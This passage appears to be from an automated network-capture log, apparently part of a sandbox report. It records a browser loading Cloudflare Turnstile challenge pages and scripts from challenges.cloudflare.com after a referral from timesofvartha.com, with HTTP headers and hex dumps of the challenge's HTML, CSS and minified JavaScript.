M(["always","execute","interaction-only"],e)}function Qt(e){return M(["true","false"],e)}function yt(e){return M(["render","execute"],e)}var $t=300,Jt=10;function ht(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(
2024-11-18 16:55:48 UTC	1369	IN	Data Raw: 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 45 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 73 69 7a 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 6c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 66 29 7d 76 61 72 20 52 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 2c 6e 2c 6f 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 6c 2c 67 3d 4d 28 6b 72 2c 28 6c 3d 28 72 3d 65 2e 64 Data Ascii: ).concat(e,"/").concat(r,"/").concat(n.theme,"/").concat(E,"/").concat(n.size,"/").concat(n.language,"/").concat(f)}var Rt=function(e){var r,n,o=window.innerWidth<400,c=e.state===Se.FAILURE_FEEDBACK\|\|e.state===Se.FAILURE_HAVING_TROUBLES,l,g=M(kr,(l=(r=e.d
2024-11-18 16:55:48 UTC	1369	IN	Data Raw: 73 68 61 6d 29 72 65 74 75 72 6e 21 31 3b 69 66 28 74 79 70 65 6f 66 20 50 72 6f 78 79 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 4f 66 2e 63 61 6c 6c 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 49 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 6c 2c 67 29 7b 76 61 72 20 68 3d 5b 6e 75 6c 6c 5d 3b 68 2e 70 75 73 68 2e 61 70 70 6c 79 Data Ascii: sham)return!1;if(typeof Proxy=="function")return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],function(){})),!0}catch(e){return!1}}function Ie(e,r,n){return je()?Ie=Reflect.construct:Ie=function(c,l,g){var h=[null];h.push.apply
2024-11-18 16:55:48 UTC	1369	IN	Data Raw: 63 61 6c 6c 28 74 68 69 73 2c 6f 29 2c 4d 65 28 42 65 28 6c 29 2c 22 63 6f 64 65 22 2c 76 6f 69 64 20 30 29 2c 6c 2e 6e 61 6d 65 3d 22 54 75 72 6e 73 74 69 6c 65 45 72 72 6f 72 22 2c 6c 2e 63 6f 64 65 3d 63 2c 6c 7d 72 65 74 75 72 6e 20 6e 7d 28 71 65 28 45 72 72 6f 72 29 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 72 29 7b 76 61 72 20 6e 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 64 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 65 29 7b 72 65 74 Data Ascii: call(this,o),Me(Be(l),"code",void 0),l.name="TurnstileError",l.code=c,l}return n}(qe(Error));function m(e,r){var n="[Cloudflare Turnstile] ".concat(e,".");throw new dr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function ze(e){ret
2024-11-18 16:55:48 UTC	1369	IN	Data Raw: 64 69 76 22 29 3b 75 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 66 69 78 65 64 22 2c 75 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 36 22 2c 75 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 75 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 2c 75 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 22 2c 75 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 22 2c 75 2e 73 74 79 6c 65 2e 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 75 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 75 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 75 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 Data Ascii: div");u.style.position="fixed",u.style.zIndex="2147483646",u.style.width="100vw",u.style.height="100vh",u.style.top="0",u.style.left="0",u.style.transformOrigin="center center",u.style.overflowX="hidden",u.style.overflowY="auto",u.style.background="rgba(0

Timestamp	Bytes transferred	Direction	Data
2024-11-18 16:55:48 UTC	800	OUT	GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/y1j5m/0x4AAAAAAAhkfK1nz8jjG-wE/auto/fbE/normal/auto/ HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: iframe Referer: https://timesofvartha.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-18 16:55:48 UTC	1362	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 16:55:48 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 26596 Connection: close cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self' cross-origin-embedder-policy: require-corp cross-origin-opener-policy: same-origin cross-origin-resource-policy: cross-origin origin-agent-cluster: ?1 accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA referrer-policy: same-origin document-policy: js-profiling
2024-11-18 16:55:48 UTC	82	IN	Data Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 65 34 39 37 64 38 31 33 63 62 36 32 66 66 34 2d 44 46 57 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a Data Ascii: Server: cloudflareCF-RAY: 8e497d813cb62ff4-DFWalt-svc: h3=":443"; ma=86400
2024-11-18 16:55:48 UTC	1294	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
2024-11-18 16:55:48 UTC	1369	IN	Data Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65 Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
2024-11-18 16:55:48 UTC	1369	IN	Data Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23 Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
2024-11-18 16:55:48 UTC	1369	IN	Data Raw: 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d Data Ascii: enge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dark #challenge-
2024-11-18 16:55:48 UTC	1369	IN	Data Raw: 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 Data Ascii: k .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-helper-loop-li
2024-11-18 16:55:48 UTC	1369	IN	Data Raw: 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 7d 74 6f 7b 66 69 6c 6c 3a 23 Data Ascii: ffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1303}to{fill:#
2024-11-18 16:55:48 UTC	1369	IN	Data Raw: 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 6c 6f 67 6f 7b 68 65 Data Ascii: flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-compact #logo{he
2024-11-18 16:55:48 UTC	1369	IN	Data Raw: 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65 78 2d 73 74 61 72 74 3b 6a 75 73 74 69 Data Ascii: .rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:flex-start;justi
2024-11-18 16:55:48 UTC	1369	IN	Data Raw: 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 33 70 78 3b 73 74 72 6f 6b 65 2d 6c Data Ascii: text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width:3px;stroke-l

Timestamp	Bytes transferred	Direction	Data
2024-11-18 16:55:49 UTC	730	OUT	GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8e497d813cb62ff4&lang=auto HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/y1j5m/0x4AAAAAAAhkfK1nz8jjG-wE/auto/fbE/normal/auto/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-18 16:55:49 UTC	331	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 16:55:49 GMT Content-Type: application/javascript; charset=UTF-8 Content-Length: 119644 Connection: close cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Server: cloudflare CF-RAY: 8e497d878b794642-DFW alt-svc: h3=":443"; ma=86400
2024-11-18 16:55:49 UTC	1038	IN	Data Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 48 50 55 62 6a 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.HPUbj2={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.terms":"https%3A%2
2024-11-18 16:55:49 UTC	1369	IN	Data Raw: 73 68 22 3a 22 52 65 66 72 65 73 68 22 2c 22 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 5f 6f 75 74 70 75 74 5f 73 75 62 74 69 74 6c 65 22 3a 22 59 6f 75 72 25 32 30 66 65 65 64 62 61 63 6b 25 32 30 72 65 70 6f 72 74 25 32 30 68 61 73 25 32 30 62 65 65 6e 25 32 30 73 75 63 63 65 73 73 66 75 6c 6c 79 25 32 30 73 75 62 6d 69 74 74 65 64 22 2c 22 74 65 73 74 69 6e 67 5f 6f 6e 6c 79 5f 61 6c 77 61 79 73 5f 70 61 73 73 22 3a 22 54 65 73 74 69 6e 67 25 32 30 6f 6e 6c 79 25 32 43 25 32 30 61 6c 77 61 79 73 25 32 30 70 61 73 73 2e 22 2c 22 6f 75 74 64 61 74 65 64 5f 62 72 6f 77 73 65 72 22 3a 22 59 6f 75 72 25 32 30 62 72 6f 77 73 65 72 25 32 30 69 73 25 32 30 6f 75 74 25 32 30 6f 66 25 32 30 64 61 74 65 2e 25 32 30 55 70 64 61 74 65 25 32 30 79 6f 75 72 25 32 Data Ascii: sh":"Refresh","feedback_report_output_subtitle":"Your%20feedback%20report%20has%20been%20successfully%20submitted","testing_only_always_pass":"Testing%20only%2C%20always%20pass.","outdated_browser":"Your%20browser%20is%20out%20of%20date.%20Update%20your%2
2024-11-18 16:55:49 UTC	1369	IN	Data Raw: 4b 28 35 34 34 29 29 2f 36 2b 70 61 72 73 65 49 6e 74 28 67 4b 28 31 31 32 39 29 29 2f 37 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 4b 28 38 39 31 29 29 2f 38 29 2b 70 61 72 73 65 49 6e 74 28 67 4b 28 31 38 35 31 29 29 2f 39 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 4b 28 31 35 33 38 29 29 2f 31 30 29 2b 70 61 72 73 65 49 6e 74 28 67 4b 28 36 32 35 29 29 2f 31 31 2c 66 3d 3d 3d 64 29 62 72 65 61 6b 3b 65 6c 73 65 20 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 63 61 74 63 68 28 67 29 7b 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 7d 28 61 2c 36 37 37 36 31 35 29 2c 65 4d 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 4e 3d 65 4d 5b 67 4c 28 31 30 38 39 29 5d 2c 65 4d 5b 67 4c 28 31 34 32 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 67 59 2c 65 29 7b Data Ascii: K(544))/6+parseInt(gK(1129))/7(-parseInt(gK(891))/8)+parseInt(gK(1851))/9(-parseInt(gK(1538))/10)+parseInt(gK(625))/11,f===d)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,677615),eM=this\|\|self,eN=eM[gL(1089)],eM[gL(1428)]=function(c,gY,e){
